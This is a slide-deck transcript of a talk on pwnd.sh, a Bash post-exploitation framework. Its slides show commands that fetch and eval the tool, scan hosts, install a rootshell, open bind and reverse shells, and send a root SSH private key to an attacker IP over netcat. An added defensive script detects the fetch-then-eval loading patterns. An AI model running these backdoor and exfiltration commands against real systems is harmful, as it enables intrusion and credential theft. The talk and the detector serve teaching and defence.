
pwnd.sh


pwnd.sh - A post exploitation tool written entirely in bash.
Presented in Null meet on 17/12/16



  1. PWND.sh Post Exploitation Framework

  2. Agenda
     SCENARIO: Have already compromised a Linux machine
     ● What's next after exploiting
     ● Different functionalities of pwnd.sh
     ● Q/A

  3. ./about_me.py
     [+] Got name : Chandrapal
     [+] Website : chandrapal.me
     [+] Founder of : Hack with GitHub
     [+] Social Accounts : @bnchandrapal @HackwithGithub
     [-] Life : Traceback (most recent call last):
           File "about_me.py", line 150, in <module>
         TypeError: Can't convert 'infosec' object to developer implicitly

  4. Author
     Itzik Kotler (@itzikkotler), CTO & Co-founder @ SafeBreach
     http://ikotler.org

  5. What to plan for in the post-exploitation phase
     Three possible things:
     ● Further penetrate into the network / endpoints
     ● Get a firmer foothold on the network / endpoints
     ● Start exfiltrating data out of the network / endpoints

  6. About the tool
     ● Newly released
     ● Easy, as it is written in Bash
     ● Interactive, and allows creating custom scripts
     ● License: 3-Clause BSD
     ● Both in-memory and on-disk deployment available
     ● Pipelines integrate pwnd.sh with other programs as well

  7. How can I get it?
     > git clone https://github.com/SafeBreach-Labs/pwndsh.git
     > cd pwndsh

  8. Why Bash and not Python / Perl / Ruby?
     ● The same Bash runs on different platforms (Mac, Linux, etc.) and different architectures (x86, x64)
     ● It is the default shell on most systems
     ● Bash has socket programming (--enable-net-redirections)
     ● You cannot fall back to Bash from Python, Perl, etc., but you can UPGRADE to Python, Perl, etc. from Bash

  9. Dependencies, or not to be Depended?
     ● No:
       – Consistent functionality across different platforms, CPUs, etc.
       – Smaller and simpler code base
     ● Yes:
       – Don't reinvent the wheel
       – Everything is a dependency in shell terms (ls, cat, etc.) (Good coders create, great coders reuse)
     PWND.SH: built with the least amount of dependencies

  10. Why in-memory?
     ● Constraints found:
       – Filesystem is read-only
       – "No space left on device"
     Solution: in-memory loading
     ● Works even if the filesystem is mounted read-only
     ● Multiple versions can co-exist (in multiple shells)
     ● Disappears after reboot

  11. Let's Start

  12. Scenario:
     Metasploitable (Ubuntu) 192.168.70.101   <-- "Find it"
     It's me                 192.168.70.100

  13. In-Memory Loading Method #1
     X=`curl -fsSL "https://raw.githubusercontent.com/SafeBreach-Labs/pwndsh/master/bin/pwnd.sh"`
     eval "$X"

  14. What if the system is on an intranet without Internet access?
     What if the system is in an Internet-censored country where GitHub is blocked?

  15. In-Memory Loading Method #2
     ● On the source computer:
       curl -fsSL "https://raw.githubusercontent.com/SafeBreach-Labs/pwndsh/master/bin/pwnd.sh"
       <Ctrl+Shift+C> to copy the output
     ● On the destination computer:
       X="<Ctrl+V>"
       eval "$X"

  16. On-Disk Loading Method
     > curl -OfsSL "https://raw.githubusercontent.com/SafeBreach-Labs/pwndsh/master/bin/pwnd.sh"
     > source pwnd.sh
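The three loading methods on slides 13, 15 and 16 share a shape a defender can look for in command auditing: content is fetched with curl and then handed to eval, or written to disk and immediately sourced. The script below is an added example, not part of this deck or of the pwnd.sh project. It reads one shell command per line (a constructed audit extract; the assumption is that the command text has already been extracted from whatever bash-history or auditd record it came from) and prints a finding for the fetch-then-eval, fetch-then-source and pipe-to-interpreter patterns. The function names and the sample command lines are constructed for this example.

```bash
#!/usr/bin/env bash
# Added example, not code from the pwnd.sh project: flag the loading patterns
# from the slides in a stream of shell commands (one command per line).
# The input format (bare command text) and the sample lines are assumptions
# constructed for this example.

# Print the last path component of the first http(s) URL in a command.
url_basename() {
    printf '%s\n' "$1" | sed -nE 's#.*https?://[^"[:space:]]*/([^/"[:space:]]+)["[:space:]]?.*#\1#p' | head -n 1
}

# Read commands from stdin; print one "FINDING <kind>: <command>" line per hit.
# State is kept across lines because the deck's methods split the download
# and the execution into separate commands.
scan_commands() {
    local cmd var file ev src
    local tainted_vars=""    # variables assigned from a curl/wget capture
    local fetched_files=""   # basenames written to disk by curl -O / wget
    while IFS= read -r cmd; do
        # (1) Download piped straight into an interpreter, all on one line.
        if printf '%s\n' "$cmd" | grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(eval|bash|sh)([[:space:]]|$)'; then
            printf 'FINDING pipe-to-interpreter: %s\n' "$cmd"
            continue
        fi
        # (2) Download captured into a variable: X=`curl ...` or X=$(curl ...).
        var=$(printf '%s\n' "$cmd" | sed -nE 's/^[[:space:]]*([A-Za-z_][A-Za-z0-9_]*)=(`|\$\()[[:space:]]*(curl|wget)[[:space:]].*/\1/p')
        if [ -n "$var" ]; then
            tainted_vars="$tainted_vars $var"
            continue
        fi
        # (3) Download written to disk (curl -O..., or wget saving to a file).
        if printf '%s\n' "$cmd" | grep -Eq '(curl[[:space:]]+-[A-Za-z]*O|wget[[:space:]])'; then
            file=$(url_basename "$cmd")
            if [ -n "$file" ]; then
                fetched_files="$fetched_files $file"
            fi
            continue
        fi
        # (4) eval of a variable that holds fetched content.
        ev=$(printf '%s\n' "$cmd" | sed -nE 's/^[[:space:]]*eval[[:space:]]+"?\$([A-Za-z_][A-Za-z0-9_]*)"?.*/\1/p')
        if [ -n "$ev" ]; then
            case " $tainted_vars " in
                *" $ev "*) printf 'FINDING eval-of-fetched-variable: %s\n' "$cmd" ;;
            esac
            continue
        fi
        # (5) source (or .) of a file that was just downloaded.
        src=$(printf '%s\n' "$cmd" | sed -nE 's/^[[:space:]]*(source|\.)[[:space:]]+(\.\/)?([^[:space:]]+).*/\3/p')
        if [ -n "$src" ]; then
            case " $fetched_files " in
                *" $src "*) printf 'FINDING source-of-downloaded-file: %s\n' "$cmd" ;;
            esac
        fi
    done
}

# Number of findings for the commands on stdin (prints 0 when there are none).
count_findings() {
    scan_commands | grep -c '^FINDING' || true
}

# Constructed sample: the deck's two loading methods, a one-line pipe into bash,
# and two benign lines (a date capture that is later eval'ed, and a plain ls).
SAMPLE_COMMANDS='X=`curl -fsSL "https://raw.githubusercontent.com/SafeBreach-Labs/pwndsh/master/bin/pwnd.sh"`
eval "$X"
curl -OfsSL "https://raw.githubusercontent.com/SafeBreach-Labs/pwndsh/master/bin/pwnd.sh"
source pwnd.sh
curl -fsSL https://example.invalid/setup.sh | bash
Y=$(date +%s)
eval "$Y"
ls -la /tmp'

printf '%s\n' "$SAMPLE_COMMANDS" | scan_commands
```

The sample yields three findings: the eval of X, the source of pwnd.sh, and the curl-to-bash one-liner; the eval of Y is not flagged because Y was not filled from a download. The clipboard variant on slide 15 (X="<Ctrl+V>" followed by eval "$X") never mentions a download in the command text, so this scanner cannot see it; that is the gap the slide relies on, and a reason to audit eval of large variables in its own right rather than only the fetch step.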
  17. Scanning a Host
     (pwnd)$ portscanner 192.168.2.132 22/tcp

  18. Scanning Networks
     (pwnd)$ for ip in $(seq 1 254); do portscanner 192.168.0.$ip 123/udp; done

  19. Local Backdoor Example
     (pwnd)$ install_rootshell
     # Remember to invoke rootshell with '-p'

  20. Remote Backdoor Example
     (pwnd)$ bindshell 1234
     # Connect to the host at 1234/tcp for a rootshell

  21. Remote Backdoor Example #2
     # On 192.168.2.1 run: nc -l 1234
     (pwnd)$ reverseshell 192.168.2.1 1234

  22. Searching for Goodies
     (pwnd)$ hunt_privkeys

  23. Exfil Example
     # On attacker machine run: nc -l <port>
     (pwnd)$ cat /root/.ssh/id_rsa | base64 | over_socket <attacker IP> <port>

  24. Plugin Support
     ● You can create plugins and add them to the project
     ● All you need is:
       – A GitHub account
       – Bash knowledge
       – Time

  25. Q&A
     We have HACKED WITH GITHUB

  26. References
     ● https://github.com/SafeBreach-Labs/pwndsh
     ● http://www.ikotler.org/JustGotPWND.pdf
     ● https://www.youtube.com/watch?v=kWU-fDv2wjM

  27. Thank You
